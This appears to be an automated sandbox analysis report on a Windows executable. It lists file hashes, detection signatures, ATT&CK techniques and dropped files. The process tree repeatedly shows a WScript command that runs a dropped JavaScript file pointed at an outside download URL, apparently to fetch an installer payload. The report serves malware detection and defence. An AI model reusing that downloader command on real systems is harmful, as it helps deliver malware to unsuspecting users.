9ebe8f069f06df36a591796e9023793fd9b96489e32d4f787103d40be69ae9fc

Analysis

max time kernel
119s
max time network
120s
platform
windows7_x64
resource
win7-20240508-en
resource tags

arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
submitted
20/05/2024, 02:52

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe
Size

184KB
MD5

5cd0ac606c84c80e326bf5e177ec004f
SHA1

c4e0834c0f352b20da3672a7a836299ed04deca1
SHA256

9ebe8f069f06df36a591796e9023793fd9b96489e32d4f787103d40be69ae9fc
SHA512

969f0178c929ac3acc55025ffb24fb2c7580eea114be149aca159d0e70f5602ca287b48d0561e9ccf481c4e34041c6efaea292529883f421b943fd3e1f707768
SSDEEP

3072:/MzsU0S0w8Hp9Rc/LB+dJGESR4hIRSYaVvb1NVFJNndnO3J:/7BSH8zUB+nGESaaRvoB7FJNndnA

Score

8^/10

execution

Malware Config

Signatures

Blocklisted process makes network request 11 IoCs

flow	pid	Process
6	1064	WScript.exe
8	1064	WScript.exe
10	1064	WScript.exe
13	2812	WScript.exe
14	2812	WScript.exe
16	2744	WScript.exe
17	2744	WScript.exe
19	1848	WScript.exe
20	1848	WScript.exe
22	808	WScript.exe
23	808	WScript.exe

Command and Scripting Interpreter: JavaScript 1 TTPs
execution

JavaScript
T1059.007
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 20 IoCs

description	pid	Process	procid_target
PID 2436 wrote to memory of 1064	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	28
PID 2436 wrote to memory of 1064	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	28
PID 2436 wrote to memory of 1064	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	28
PID 2436 wrote to memory of 1064	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	28
PID 2436 wrote to memory of 2812	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	30
PID 2436 wrote to memory of 2812	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	30
PID 2436 wrote to memory of 2812	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	30
PID 2436 wrote to memory of 2812	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	30
PID 2436 wrote to memory of 2744	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	32
PID 2436 wrote to memory of 2744	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	32
PID 2436 wrote to memory of 2744	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	32
PID 2436 wrote to memory of 2744	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	32
PID 2436 wrote to memory of 1848	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	34
PID 2436 wrote to memory of 1848	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	34
PID 2436 wrote to memory of 1848	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	34
PID 2436 wrote to memory of 1848	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	34
PID 2436 wrote to memory of 808	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	36
PID 2436 wrote to memory of 808	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	36
PID 2436 wrote to memory of 808	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	36
PID 2436 wrote to memory of 808	2436	5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe	36

C:\Users\Admin\AppData\Local\Temp\5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\5cd0ac606c84c80e326bf5e177ec004f_JaffaCakes118.exe"
1⤵
- Suspicious use of WriteProcessMemory
PID:2436
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12E5.js" http://www.djapp.info/?domain=WoItwFlnRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxG C:\Users\Admin\AppData\Local\Temp\fuf12E5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1064
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12E5.js" http://www.djapp.info/?domain=WoItwFlnRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxG C:\Users\Admin\AppData\Local\Temp\fuf12E5.exe
  2⤵
  - Blocklisted process makes network request
  PID:2812
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12E5.js" http://www.djapp.info/?domain=WoItwFlnRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxG C:\Users\Admin\AppData\Local\Temp\fuf12E5.exe
  2⤵
  - Blocklisted process makes network request
  PID:2744
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12E5.js" http://www.djapp.info/?domain=WoItwFlnRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxG C:\Users\Admin\AppData\Local\Temp\fuf12E5.exe
  2⤵
  - Blocklisted process makes network request
  PID:1848
- C:\Windows\SysWOW64\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\fuf12E5.js" http://www.djapp.info/?domain=WoItwFlnRt.com&dotnet=4&file=installer&ip=52.1.45.42:80&pub_id=377&setup_id=300&srcid=UFAf_PI7Dh3IizD6k3VGXf8V7slq5pJZmGYrhLIFYhTJiUp2-KcxyCtDJmXHwE0C3Tqr4GalSgENm5FB509zxG C:\Users\Admin\AppData\Local\Temp\fuf12E5.exe
  2⤵
  - Blocklisted process makes network request
  PID:808

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

JavaScript

T1059.007

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
1KB

MD5
cbc282c89eaf33dcc25496b655dd3335

SHA1
12d03e52947a33c0aa0cb46699d361ea92c319d2

SHA256
ed35539ae2e3de90b4d09f6dbed4fc19febf9c5ec3b9e54bbe6b972a89bd63c0

SHA512
eb2411b661feeccc44ea7b9bf096279a9c5a9fd504836ba827fcb9b6a815796a8fd4b03c8ec0e36ea7eebe82c0f059cbca3509e52a400921401a1b485bcc360b

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
724B

MD5
8202a1cd02e7d69597995cabbe881a12

SHA1
8858d9d934b7aa9330ee73de6c476acf19929ff6

SHA256
58f381c3a0a0ace6321da22e40bd44a597bd98b9c9390ab9258426b5cf75a7a5

SHA512
97ba9fceab995d4bef706f8deef99e06862999734ebe6a05832c710104479c6337cbf0a76e1c1e0f91566a61334dc100d837dfd049e20da765fe49def684f9c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA

Filesize
410B

MD5
0a9f62208b9042bebd77486baadbfda2

SHA1
b2d082065bf9d1da3f165b09ac39904c55f97968

SHA256
93888e4c606ace274cbb690a29863f11bd157725b02efab28e44d22f50e03b63

SHA512
67cf512647992bea447ea89ee31b7da2b9edffba4319ed4a116741494ad768358e87d9dba8d3c550e908f1252ebb80ed0ff218cf2d05d1cd4d7b808e40bd6afc

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
344B

MD5
17f22c4a34f4851b7770fda85516381e

SHA1
771c1fc73ed94ab373d6b2ef07d26c2ce54ce9fa

SHA256
d808b5183b60d597166ed3add72f82ace524d6e564c9d9d710310a3d4eade5fe

SHA512
2613f9f7cf5a56625a00d8e85c6a7fe3d81ecf2d2acbf9b136cc065c314f33ee878838b664bf0ed59cd291385411ab260aafc4d0c74b7fa08185e7d419cbe6ba

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_F2DAF19C1F776537105D08FC8D978464

Filesize
392B

MD5
8e4c6ed9a9dd00576a2780971752da84

SHA1
b2415358b3cee4ae4ef13d046c8504eb2c3f309a

SHA256
0faa4007b0abe35644062f4270e41cbaedb2362e2f7f43637b5d163102e52515

SHA512
69371dcb5ea8bd7d937b274be17a21f733548b4cd3dcc625dea71c5b9a0ab31957a700dd6c15dc4ddb5b2e2ad17c821dcac9b51fd3c92d3ccde1e1edbf57825f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
40KB

MD5
d65e2716bab5718e9f3fd8ec8a4aef34

SHA1
de685bcf73c4749627f3ae6c944ed6a9ee157ef7

SHA256
346dbec7514abccaa2cc951d72e489a11c52fd96c542d917805e91ff384a839f

SHA512
d45914dcca4bfb0d23585b2273754483c2ec28084f63eed6075a5bac520c3ce4a69c241bd1fdf734e49952dc03cf72e7fc8af2f609f3dca5e8d571c2e47f0b41

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\IO0LJX84\domain_profile[1].htm

Filesize
40KB

MD5
e85cf3fc568230dae572281846ad25dd

SHA1
9c02b2fbaa74cd20882834ec1cb1266dcd5c6fa3

SHA256
e26aea1aa10595a07e6add6a6a013419da979ed38148686ecc5b623e66fe0733

SHA512
a35eec92e62b6429984b43e28791bdfeda76e7afebf94142eb10f876cf390f8cc6ddcada0e568414b1062fe603380bfc7169683ac0ef5b540f89098b7051d03f

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

Filesize
40KB

MD5
c62e73ce66863b32d8f013ba05db3fce

SHA1
ce197d4d5c5fa7ce32161ce2553bd3624bad72d3

SHA256
20c1feb0b2f08bfe63617fa43a278370377785f005d85767543784b451e64cf9

SHA512
3eabd10676b7c943197d780fdbd9b15c285ba5ef0f25b345039e079fd15cc7aa27300b92381b7a90e79167a73d12e41ef0ac2fb7e858b2a314238c224fe91660

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\SVBQZB4R\domain_profile[1].htm

Filesize
6KB

MD5
72783cb4f34f404f2e0e8cb5f900b5f3

SHA1
db563a7603ebbb5f731beaa6d1b3f002cae73a8e

SHA256
61fdb6dc6b3f65fa345f461c08487c015f217a4f572b73058810ac1e43b52731

SHA512
bf3a352d841514020ff7545355ffb2051013e4770933092809dd934aefb041e8c5e85316102838078a1ce308e4f9e00dbc029f40ec8392fe6826ee1c95bed566

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab4200.tmp

Filesize
68KB

MD5
29f65ba8e88c063813cc50a4ea544e93

SHA1
05a7040d5c127e68c25d81cc51271ffb8bef3568

SHA256
1ed81fa8dfb6999a9fedc6e779138ffd99568992e22d300acd181a6d2c8de184

SHA512
e29b2e92c496245bed3372578074407e8ef8882906ce10c35b3c8deebfefe01b5fd7f3030acaa693e175f4b7aca6cd7d8d10ae1c731b09c5fa19035e005de3aa

Download Submit
C:\Users\Admin\AppData\Local\Temp\Tar5A80.tmp

Filesize
177KB

MD5
435a9ac180383f9fa094131b173a2f7b

SHA1
76944ea657a9db94f9a4bef38f88c46ed4166983

SHA256
67dc37ed50b8e63272b49a254a6039ee225974f1d767bb83eb1fd80e759a7c34

SHA512
1a6b277611959720a9c71114957620517ad94541302f164eb872bd322292a952409bafb8bc2ac793b16ad5f25d83f8594ccff2b7834e3c2b2b941e6fc84c009a

Download Submit
C:\Users\Admin\AppData\Local\Temp\fuf12E5.js

Filesize
3KB

MD5
3813cab188d1de6f92f8b82c2059991b

SHA1
4807cc6ea087a788e6bb8ebdf63c9d2a859aa4cb

SHA256
a3c5baef033d6a5ab2babddcfc70fffe5cfbcef04f9a57f60ddf21a2ea0a876e

SHA512
83b0c0ed660b29d1b99111e8a3f37cc1d2e7bada86a2a10ecaacb81b43fad2ec94da6707a26e5ae94d3ce48aa8fc766439df09a6619418f98a215b9d9a6e4d76

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\OFJLLBYK.txt

Filesize
177B

MD5
6e9d56c98979938628b83fbdec3a6c7d

SHA1
ee76d96a05fb710a9f0c07da6b6a3ead52cab32b

SHA256
84c10c8b1dcbcbc69909c5e52485e1882fef0cd13a7d11e8a727a27d333cd1dd

SHA512
dcac2d16de66e5127f47f8efcc57454210ece4888834f3bb6fa2c160c03267dcbc68b6e3af81a57efef928d561fda6b0c596f7bb495a29b49e5314c2fb19238f

Download Submit